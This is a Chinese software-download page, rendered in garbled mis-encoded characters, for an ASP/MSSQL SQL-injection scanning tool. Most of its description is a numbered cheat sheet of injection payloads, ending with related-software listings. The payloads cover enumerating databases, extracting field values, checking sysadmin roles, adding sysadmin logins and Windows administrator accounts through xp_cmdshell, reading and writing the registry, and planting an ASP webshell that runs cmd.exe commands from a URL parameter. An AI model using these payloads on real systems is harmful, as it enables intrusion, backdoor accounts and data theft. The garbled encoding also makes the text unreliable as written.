ÍøÕ¾°²È«¼ì²âÈëÇÖ¹¤¾ß

ÍøÕ¾°²È«¼ì²âÈëÇÖ¹¤¾ß

ÍøÕ¾°²È«¼ì²âÈëÇÖ¹¤¾ß

ÍøÕ¾°²È«¼ì²âÈëÇÖ¹¤¾ß

È˹¤¼ì²â£¬°²ÐÄÏÂÔØ
Èí¼þͶËß
·ÖÀà
ÍøÂ簲ȫ
´óС
1MB
ÓïÑÔ
¼òÌåÖÐÎÄ
Èí¼þÊÚȨ
Ãâ·ÑÈí¼þ
ƽ̨
WinAll
¸üÐÂʱ¼ä
2025-05-04

±¾×¨Óù¤¾ß×÷ÓÃÊ®·ÖÇ¿¾¢£¬ÆÚ´ýѧÉúÃÇÓÃÒÔÕýµÀ£¬±ðÈ¥×öһЩΪ·Ç×÷´õµÄÈÃÈËÊ®·Ö¿É³ÜµÄʶù£¬ÓÉVBÓïÑÔ׫дµÄÍøÖ·ÍøÕ¾Â©¶´É¨ÃèרÓù¤¾ßµÄÃû×Ö£¬ASPÒýÈëÍøÕ¾Â©¶´É¨ÃèרÓù¤¾ß£¬ÓÈÆäÔÚSQL ServerÒýÈë¼ìÑé²ãÃæÓзdz£¸ßµÄ׼ȷ¶È¡£

1.·Ö±æÊDz»ÊÇÓÐÒýÈë

;and 1=1

;and 1=2

2.·ÖÎöÅжÏÊDz»ÊÇmssql

;and user0

3.·Ö±æÊý¾Ý¿âϵͳÈí¼þ

;and (select count(*) from sysobjects)0 mssql

;and (select count(*) from msysobjects)0 Access

4.ÒýÈëÖ÷Òª²ÎÊýÊDZêʶ·û

and [²éѯÌõ¼þ] and =

5.¼ìË÷ʱû¹ýÂÇÖ÷Òª²ÎÊýµÄ

and [²éѯÌõ¼þ] and %=

6.²ÂÊý¾Ý¿â

;and (Select Count(*) from [Êý¾Ý¿âÃû])0

7.²Â×Ö¶Î

;and (Select Count(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)0

8.²Â×Ö¶ÎÖмͼ³¤¶Ì

;and (select top 1 len(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)0

9.(1)²Â×ֶεÄASCIIÖµ£¨access£©

;and (select top 1 asc(mid(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)0

(2)²Â×ֶεÄasciiÖµ£¨mssql£©

;and (select top 1 unicode(substring(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)0

10.¼ì²â¹ÜÀíȨÏÞ¹¹Ô죨mssql£©

;and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--

;and 1=(SELECT IS_MEMBER(db_owner));--

11.¼ÓÉÏmssqlºÍÌåϵµÄÕ˺Å

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,

username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin

username;--

;exec master.dbo.xp_cmdshell net user username

password /workstations:* /TIMes:all

/passwordchg:yes /passwordreq:yes /active:yes /add

;--

;exec master.dbo.xp_cmdshell net user username

password /add;--

;exec master.dbo.xp_cmdshell net localgroup

administrators username /add;--

12.(1)½âÎöxmlÎļþĿ¼

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree c:\

;and (select top 1 paths from dirs)0

;and (select top 1 paths from dirs where paths not

in(Éϲ½»ñµÃµÄpaths)))

(2)½âÎöxmlÎļþĿ¼

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- µÃµ½µ±½ñÈ«²¿¿ØÖÆÆ÷

;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- µÃµ½¸ùĿ¼Ŀ¼

;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- µÃµ½È«²¿¸ùĿ¼µÄÎļþĿ¼Ê÷Ðνṹ

;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- ²éѯ×ÊÁϵăÈÈÝ

13.mssqlÖеÄsqlÓï¾ä

xp_regenumvalues ×¢²á±íÎļþ¸ù¼ü, ×Ó¼ü

;exec xp_regenumvalues HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\windows\CurrentVersion\Run ÒԺü¸¸ö¼Ç¼¼¯·½·¨»Øµ½È«²¿¼üÖµ

xp_regread ¸ù¼ü,×Ó¼ü,¼üÖµÃû

;exec xp_regread HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

CommonFilesDir »Øµ½Öƶ©¼üµÄÖµ

xp_regwrite ¸ù¼ü,×Ó¼ü, ÖµÃû, ÖµÖÖÀà, Öµ

ÖµÖÖÀàÓÐ2ÖÖREG_SZ ±íÃ÷×Ö·ûÐÍ,REG_DWORD ±íÃ÷ÕûÐÎ

;exec xp_regwrite HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

TestValueName,reg_sz,hello ÔØÈë×¢²á±íÎļþ

xp_regdeletevalue ¸ù¼ü,×Ó¼ü,ÖµÃû

exec xp_regdeletevalue HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

TestValueName ɾµôijһֵ

xp_regdeletekey HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey Í˸ñ¼ü,°üº¬¸Ã¼üÏÂÈ«²¿Öµ

14.mssqlµÄbackup½¨Á¢webshell

use model

create table cmd(str image);

insert into cmd(str) values (% Dim oScript %);

backup database model to disk=c:\l.asp;

15.mssqlÄÚǶº­Êý

;and (select @@version)0 µÃµ½WindowsµÄ°æ±¾ÐÅÏ¢

;and user_name()=dbo ·Ö±æµ±½ñϵͳÈí¼þµÄÁª½Ó¿Í»§ÊÇ·ñsa

;and (select user_name())0 ±¬µ±½ñϵͳÈí¼þµÄÁª½Ó¿Í»§

;and (select db_name())0 »ñµÃµ±½ñÁª½ÓµÄÊý¾Ý¿â

16.¼òÔ¼µÄwebshell

use model

create table cmd(str image);

insert into cmd(str) values (%=server.createobject(wscript.shell).exec(cmd.exe /c request(c)).stdout.readall%);

backup database model to disk=g:\wwwtest\l.asp;

ÒªÇóµÄÇé¿öÏ£¬ÏñÕâÑù×ÓÓãº

l.asp?c=dir

Ïà¹Ø×¨Ìâ
Êý¾Ý¿âÈí¼þ 40¿î

¶àÌØÈí¼þרÌâΪÄúÌṩÊý¾Ý¿âÈí¼þ,Ãâ·ÑÊý¾Ý¿âÈí¼þ,Êý¾Ý¿âÈí¼þÅÅÐÐ;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ

ÊÖ»ú¶¨Î»Èí¼þ°²×¿°æ
ÊÖ»ú¶¨Î»Èí¼þ°²×¿°æ
¸üÐÂÈÕÆÚ£º2025-02-19
Excel°²×¿°²×¿°æ
Excel°²×¿°²×¿°æ
¸üÐÂÈÕÆÚ£º2025-04-29
°²×¿»ÊµÛ°²×¿°æ
°²×¿»ÊµÛ°²×¿°æ
¸üÐÂÈÕÆÚ£º2025-04-28
°²×¿»ùÕ¾Ëø¶¨Èí¼þ
°²×¿»ùÕ¾Ëø¶¨Èí¼þ
¸üÐÂÈÕÆÚ£º2025-04-27
°²×¿ÊÖ»ú×ÖÌåÈí¼þ
°²×¿ÊÖ»ú×ÖÌåÈí¼þ
¸üÐÂÈÕÆÚ£º2025-05-11
°²×¿ÊÖ»ú±¸·ÝÈí¼þ
°²×¿ÊÖ»ú±¸·ÝÈí¼þ
¸üÐÂÈÕÆÚ£º2025-05-06
Èí¼þÌìÌð²×¿°æ
Èí¼þÌìÌð²×¿°æ
¸üÐÂÈÕÆÚ£º2025-05-06
EGOÈí¼þ°²×¿°æ
EGOÈí¼þ°²×¿°æ
¸üÐÂÈÕÆÚ£º2025-05-05
Êý¾Ý¿â¹¤¾ß 39¿î

¶àÌØÈí¼þרÌâΪÄúÌṩÊý¾Ý¿â¹¤¾ß,Êý¾Ý¿â²éѯ¹¤¾ß,Êý¾Ý¿âÁ¬½Ó¹¤¾ß;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ

DBDiff(Êý¾Ý¿â¶Ô±È¹¤¾ß)
DBDiff(Êý¾Ý¿â¶Ô±È¹¤¾ß)
¸üÐÂÈÕÆÚ£º2025-02-19
Scuba(Êý¾Ý¿âɨÃ蹤¾ß)
Scuba(Êý¾Ý¿âɨÃ蹤¾ß)
¸üÐÂÈÕÆÚ£º2025-02-19
Dataedo(Êý¾Ý¿âÎĵµ¹¤¾ß)
Dataedo(Êý¾Ý¿âÎĵµ¹¤¾ß)
¸üÐÂÈÕÆÚ£º2025-02-19
DBSync(Êý¾Ý¿âͬ²½¹¤¾ß)
DBSync(Êý¾Ý¿âͬ²½¹¤¾ß)
¸üÐÂÈÕÆÚ£º2025-04-27
Êý¾Ý¿âͬ²½¹¤¾ß(DBSync)
Êý¾Ý¿âͬ²½¹¤¾ß(DBSync)
¸üÐÂÈÕÆÚ£º2025-04-25
ExcelToSQL²åÈëÊý¾Ý¿â¹¤¾ß
ExcelToSQL²åÈëÊý¾Ý¿â¹¤¾ß
¸üÐÂÈÕÆÚ£º2025-05-22
MysqlCopier(Êý¾Ý¿â¸´Öƹ¤¾ß)
MysqlCopier(Êý¾Ý¿â¸´Öƹ¤¾ß)
¸üÐÂÈÕÆÚ£º2025-04-29
PDMan(Êý¾Ý¿â½¨Ä£¹¤¾ß)
PDMan(Êý¾Ý¿â½¨Ä£¹¤¾ß)
¸üÐÂÈÕÆÚ£º2025-04-29
Êý¾Ý¿â±à¼­¹¤¾ß(SqlLobEditor)
Êý¾Ý¿â±à¼­¹¤¾ß(SqlLobEditor)
¸üÐÂÈÕÆÚ£º2025-04-25
ÍøËÙ¼ì²â 40¿î

¶àÌØÈí¼þרÌâΪÄúÌá¹©ÍøËÙ¼ì²â,ÍøËÙ¼ì²âÔÚÏß,ÊÖ»úÍøËÙ²âÊÔÔÚÏß;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ

ÍøËÙ²âÊÔ
ÍøËÙ²âÊÔ
¸üÐÂÈÕÆÚ£º2025-02-19
²âÍøËÙ
²âÍøËÙ
¸üÐÂÈÕÆÚ£º2025-02-19
²âÍøËÙ
²âÍøËÙ
¸üÐÂÈÕÆÚ£º2025-02-19
ÍøËÙ¹ÜÀí
ÍøËÙ¹ÜÀí
¸üÐÂÈÕÆÚ£º2025-02-19
ÍøËÙÏÞÖÆ
ÍøËÙÏÞÖÆ
¸üÐÂÈÕÆÚ£º2025-02-19
ÍøËÙͨ
ÍøËÙͨ
¸üÐÂÈÕÆÚ£º2025-02-19
¹ýÌÚѶTPϵͳ¼ì²âÆÆ½â²å¼þ
¹ýÌÚѶTPϵͳ¼ì²âÆÆ½â²å¼þ
¸üÐÂÈÕÆÚ£º2025-04-11
Shadow x²âÍøËÙÈí¼þ
Shadow x²âÍøËÙÈí¼þ
¸üÐÂÈÕÆÚ£º2025-04-29
ÉÏÍøËٶȲâÊÔÈí¼þ
ÉÏÍøËٶȲâÊÔÈí¼þ
¸üÐÂÈÕÆÚ£º2025-02-19
Éù¿¨¼ì²â 41¿î

¶àÌØÈí¼þרÌâΪÄúÌṩÉù¿¨¼ì²â,Éù¿¨¼ì²âÈí¼þ,ÊÖ»úÉù¿¨Èí¼þ;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ

NetSpeedMonitor(ÍøËÙ¼ì²âÈí¼þ)
NetSpeedMonitor(ÍøËÙ¼ì²âÈí¼þ)
¸üÐÂÈÕÆÚ£º2025-04-28
MyDiskTest(À©Èݼì²âÈí¼þ)
MyDiskTest(À©Èݼì²âÈí¼þ)
¸üÐÂÈÕÆÚ£º2025-04-28
ÏÔ´æ¼ì²âÈí¼þMats
ÏÔ´æ¼ì²âÈí¼þMats
¸üÐÂÈÕÆÚ£º2025-04-30
µç³Ø¼ì²âÈí¼þ(Smarter
µç³Ø¼ì²âÈí¼þ(Smarter
¸üÐÂÈÕÆÚ£º2025-04-25
³µÁ¾¼ì²âÊÕ·ÑÈí¼þ
³µÁ¾¼ì²âÊÕ·ÑÈí¼þ
¸üÐÂÈÕÆÚ£º2025-05-13
ÏÔ´æ¼ì²âÈí¼þMats
ÏÔ´æ¼ì²âÈí¼þMats
¸üÐÂÈÕÆÚ£º2025-05-08
¹ýÌÚѶTPϵͳ¼ì²âÆÆ½â²å¼þ
¹ýÌÚѶTPϵͳ¼ì²âÆÆ½â²å¼þ
¸üÐÂÈÕÆÚ£º2025-04-11
½ø³ÌÉù¿¨ÉÁ±ÜÈí¼þ
½ø³ÌÉù¿¨ÉÁ±ÜÈí¼þ
¸üÐÂÈÕÆÚ£º2025-02-19
Ö÷°å¼ì²â 41¿î

¶àÌØÈí¼þרÌâΪÄúÌṩÖ÷°å¼ì²â,Ö÷°å¼ì²âÈí¼þ,Ö÷°å¼ì²âºÃ»µ;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ

ÏÔ´æ¼ì²âÈí¼þMats
ÏÔ´æ¼ì²âÈí¼þMats
¸üÐÂÈÕÆÚ£º2025-04-30
µç³Ø¼ì²âÈí¼þ(Smarter
µç³Ø¼ì²âÈí¼þ(Smarter
¸üÐÂÈÕÆÚ£º2025-04-25
³µÁ¾¼ì²âÊÕ·ÑÈí¼þ
³µÁ¾¼ì²âÊÕ·ÑÈí¼þ
¸üÐÂÈÕÆÚ£º2025-05-13
ÏÔ´æ¼ì²âÈí¼þMats
ÏÔ´æ¼ì²âÈí¼þMats
¸üÐÂÈÕÆÚ£º2025-05-08
»ªË¶Ö÷°å¿ØÖÆrgb·çÉÈÈí¼þ
»ªË¶Ö÷°å¿ØÖÆrgb·çÉÈÈí¼þ
¸üÐÂÈÕÆÚ£º2025-04-29
»ªÇæÖ÷°åµÆ¹â¿ØÖÆÈí¼þ
»ªÇæÖ÷°åµÆ¹â¿ØÖÆÈí¼þ
¸üÐÂÈÕÆÚ£º2025-04-27
¹ýÌÚѶTPϵͳ¼ì²âÆÆ½â²å¼þ
¹ýÌÚѶTPϵͳ¼ì²âÆÆ½â²å¼þ
¸üÐÂÈÕÆÚ£º2025-04-11
ÍøÓÑÆÀÂÛ
ÓÑÇéÁ´½Ó
ÎÂܰÌáʾ
ÄúºÃ:
¸ÐлÄúÏÂÔØ±¾Èí¼þ¡£
ÏÖÑûÇëÄú¹Ø×¢ÎÒÃǵÄ΢ÐŹ«Öںš£
Äú½«»ñÈ¡µ½´ËÈí¼þµÄ°²×°Ê¹Óý̳̼°Èí¼þµÄÏà¹Ø¿Î³Ìѧϰ¡£
ÈçÓÐÒÉÎÊÒ²¿ÉÔÚ΢ÐŹ«ÖÚºÅÖлظ´ÎÊÌ⣬½«»áÓÐÈ˹¤¿Í·þΪÄú½â´ð¡£
ºÃµÄ£¬ÎÒÖªµÀÁË